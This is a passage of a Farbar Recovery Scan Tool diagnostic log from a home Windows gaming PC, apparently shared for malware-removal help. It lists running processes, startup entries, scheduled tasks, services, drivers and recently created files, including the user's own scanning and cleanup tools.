(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCopyAccelerator.exe
(Discord Inc. -> Discord Inc.) C:\Users\Miggy\AppData\Local\Discord\app-1.0.9005\Discord.exe <6>
(explorer.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <11>
(explorer.exe ->) (Mega Limited -> Mega Limited) C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe
(explorer.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingApp_2207.1001.6.0_x64__8wekyb3d8bbwe\XboxAppServices.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Shenzhen Evision Semiconductor Technology Co., Ltd -> ) C:\Program Files (x86)\ONN\onn.exe
(explorer.exe ->) (Spotify AB -> Spotify Ltd) C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe <6>
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Nvidia Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(services.exe ->) (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(services.exe ->) (Electronic Arts, Inc. -> Electronic Arts) C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservices.exe
(services.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.GamingServices_4.67.21001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe <2>
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(svchost.exe ->) (Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_3.0.1.1_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxApp_48.89.25001.0_x64__8wekyb3d8bbwe\XboxApp.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.822.6271.0_x64__8wekyb3d8bbwe\GameBar.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.822.6271.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [856288 2019-10-29] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3071232 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-08-04] (Adobe Inc. -> )
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [850208 2022-05-12] (Adobe Inc. -> Adobe Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Discord] => C:\Users\Miggy\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32706000 2022-07-19] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4230544 2022-07-26] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [com.blitz.app] => C:\Users\Miggy\AppData\Local\Programs\Blitz\Blitz.exe --autostart (No File)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [Spotify] => C:\Users\Miggy\AppData\Roaming\Spotify\Spotify.exe [19987360 2022-07-22] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3148016 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Run: [ONN.] => C:\Program Files (x86)\ONN.\onn.exe [4436120 2021-11-14] (Shenzhen Evision Semiconductor Technology Co., Ltd -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)
Startup: C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2022-06-05]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Miggy\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {03FE5072-C0AA-4FD4-A5AB-D07AB72268EE} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {0EC66224-E7F9-4896-AC22-604F9481BFD0} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2826498334-1472090739-1589450912-1002 => C:\Users\Miggy\AppData\Local\MEGAsync\MEGAupdater.exe [2531504 2022-07-23] (Mega Limited -> )
Task: {186D8709-E02A-4B19-ABAC-627A0E438748} - System32\Tasks\Opera GX scheduled Autoupdate 1643160997 => C:\Users\Miggy\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (No File)
Task: {19056965-D8E2-42BA-9198-BA321F141CBC} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {316B07D7-B842-4CA6-9143-E47A44373CE9} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {34FBA49C-DB6E-466D-9949-8BA989A2D755} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {34FF53DA-910C-48FF-A27B-6C77610DC964} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-03-01] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {3A4DAEC6-DB69-41C4-B1CD-2D21D21DAF48} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-04-24] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {7837ED71-57CE-4F2F-9588-701188B7FA26} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3427104 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {7AFC5FDF-5FDB-4E8D-B085-FA011974B74B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8184678B-D5E0-4F9D-A393-D29C7ED8D710} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Miggy\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [21737944 2022-07-21] (ESET, spol. s r.o. -> ESET)
Task: {8B92C189-E256-455B-B83D-BB9EA201CEC2} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {9B6AA54B-A7A6-44EE-B7FB-7023090FBCC6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {AFA01216-F820-4523-B888-4643BC2C4370} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B22F7ED0-E54D-4755-BF66-7C277C4F783F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {B4140878-3094-4AA3-8AF4-08C5C55FCA4B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {C52D7066-5B3F-408A-AF5C-CCC3BD7E9982} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [646344 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {D1EBC865-4929-4089-875B-C0F67EC2595B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-07-31] (Google LLC -> Google LLC)
Task: {D2EA96E7-1FC2-48FC-8CF6-8EBDE83366F4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {DAF682D5-38DA-494C-96CE-78534D6E588E} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {EACF08E7-F007-4892-8304-796E244D2C74} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {F0E4183A-6ABA-4A9B-B752-1347AA639C62} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-03-30] (Nvidia Corporation -> NVIDIA Corporation)
Task: {FAA453B5-6123-4A6F-8608-AC30E0E9F16F} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{37bbd38f-8acb-4c40-b864-ada8bb32978f}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{414f2442-2e8a-4d1e-a13b-9d87f203ed03}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5c61890f-5044-4e9c-8570-a54ea7f72db7}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{c27cbc7d-a6d2-4954-a213-802ef8bff43d}: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{f885ed82-1422-4cda-906b-0d4ab502143f}: [DhcpNameServer] 192.168.254.254
 
Edge: 
=======
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Miggy\AppData\Local\Microsoft\Edge\User Data\Default [2022-04-28]
 
FireFox:
========
FF DefaultProfile: 3lkpfjap.default
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\3lkpfjap.default [2022-07-17]
FF ProfilePath: C:\Users\Miggy\AppData\Roaming\Mozilla\Firefox\Profiles\wmxmjnvg.default-release [2022-07-26]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2022-05-12] (Adobe Inc. -> Adobe Systems)
 
Chrome: 
=======
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default [2022-07-30]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2022-07-05]
CHR Extension: (Adblock for Youtube™) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2022-07-11]
CHR Extension: (Google Docs Offline) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-07-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Profile: C:\Users\Miggy\AppData\Local\Google\Chrome\User Data\System Profile [2022-07-17]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [919328 2022-04-18] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3815712 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3580200 2022-04-13] (Adobe Inc. -> Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-07-28] (BattlEye Innovations e.K. -> )
R3 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [11293832 2022-07-28] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811496 2022-06-21] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-07-26] (EasyAntiCheat Oy -> Epic Games, Inc.)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029456 2022-07-14] (Epic Games Inc. -> Epic Games, Inc.)
S3 EQU8_19; C:\ProgramData\EQU8\Totally Accurate Battlegrounds\bin\anticheat.x64.equ8.exe [6221456 2021-10-02] (Int3 Software AB -> Int3 Software AB)
S3 EQU8_4; C:\ProgramData\EQU8\AimLab\bin\anticheat.x64.equ8.exe [8468624 2021-12-18] (Int3 Software AB -> Int3 Software AB)
S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-07-05] (Electronic Arts, Inc. -> Electronic Arts)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\Wellbia.com\ucldr_battlegrounds_gl.exe [5938216 2022-07-28] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10477800 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-06-22] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [10062496 2022-07-28] (PUBG CORPORATION -> KRAFTON, Inc)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_4d7400884d0d52e3\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
S3 EQU8_HELPER_19; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_19.sys [38032 2021-10-08] (Int3 Software AB -> )
S3 gdrv; C:\Windows\gdrv.sys [25640 2020-07-01] (Giga-Byte Technology -> Windows ® Server 2003 DDK provider)
R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8596792 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [1431328 2022-07-28] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 MpKsl628e4265; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{FAAE6B28-3F21-4216-876A-87905047AE75}\MpKslDrv.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) (Whitelisted) =========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-29 23:18 - 2022-07-29 23:19 - 1020300193 _____ (Garrett Tube) C:\Users\Miggy\Downloads\fredbear-and-friends-left-to-rot.exe
2022-07-28 22:20 - 2022-07-28 22:20 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\com.adobe.dunamis
2022-07-28 20:18 - 2022-07-28 20:18 - 000000223 _____ C:\Users\Miggy\Desktop\Persona 4 Golden.url
2022-07-28 18:03 - 2022-07-28 18:03 - 000000000 ____D C:\Users\Miggy\AppData\Local\MultiVersus
2022-07-28 14:06 - 2022-07-28 14:06 - 001431328 _____ (Wellbia.com Co., Ltd.) C:\WINDOWS\xhunter1.sys
2022-07-28 14:06 - 2022-07-28 14:06 - 000000000 ____D C:\Program Files\Common Files\Wellbia.com
2022-07-28 13:08 - 2022-07-28 13:08 - 000000222 _____ C:\Users\Miggy\Desktop\PUBG BATTLEGROUNDS.url
2022-07-27 18:02 - 2022-07-28 22:43 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-26 17:03 - 2022-07-26 17:03 - 000000223 _____ C:\Users\Miggy\Desktop\MultiVersus.url
2022-07-26 13:11 - 2022-07-26 13:11 - 000002034 _____ C:\Users\Miggy\Desktop\malwarebytes.txt
2022-07-26 12:50 - 2022-07-26 12:50 - 000000000 ____D C:\Users\Miggy\AppData\Local\mbam
2022-07-26 12:49 - 2022-07-26 12:49 - 000000000 ____D C:\Program Files\Malwarebytes
2022-07-26 12:48 - 2022-07-26 12:48 - 002556344 _____ (Malwarebytes) C:\Users\Miggy\Downloads\MBSetup-C4CAECC7.exe
2022-07-24 20:41 - 2022-07-24 20:41 - 000000222 _____ C:\Users\Miggy\Desktop\Fallout 4.url
2022-07-21 23:46 - 2022-07-21 23:47 - 464020665 _____ C:\Users\Miggy\Downloads\jolly3-v1.0.3.exe
2022-07-21 17:21 - 2022-07-21 17:21 - 000003842 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2022-07-21 17:21 - 2022-07-21 17:21 - 000003400 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2022-07-21 17:21 - 2022-07-21 17:21 - 000001172 _____ C:\Users\Miggy\Documents\eset.txt
2022-07-21 15:20 - 2022-07-21 15:20 - 000001382 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000001276 _____ C:\Users\Miggy\Desktop\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\ESET
2022-07-21 15:19 - 2022-07-21 15:19 - 015274968 _____ (ESET) C:\Users\Miggy\Downloads\esetonlinescanner.exe
2022-07-20 12:12 - 2022-07-28 15:50 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-07-19 16:46 - 2022-07-30 13:12 - 000000000 ____D C:\Users\Miggy\Downloads\FRST-OlderVersion
2022-07-17 17:51 - 2022-07-30 13:14 - 000000839 _____ C:\Users\Miggy\Downloads\Fixlog.txt
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-21 17:24 - 000040667 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-30 13:25 - 000025886 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-30 13:25 - 000000000 ____D C:\FRST
2022-07-15 22:31 - 2022-07-30 13:12 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
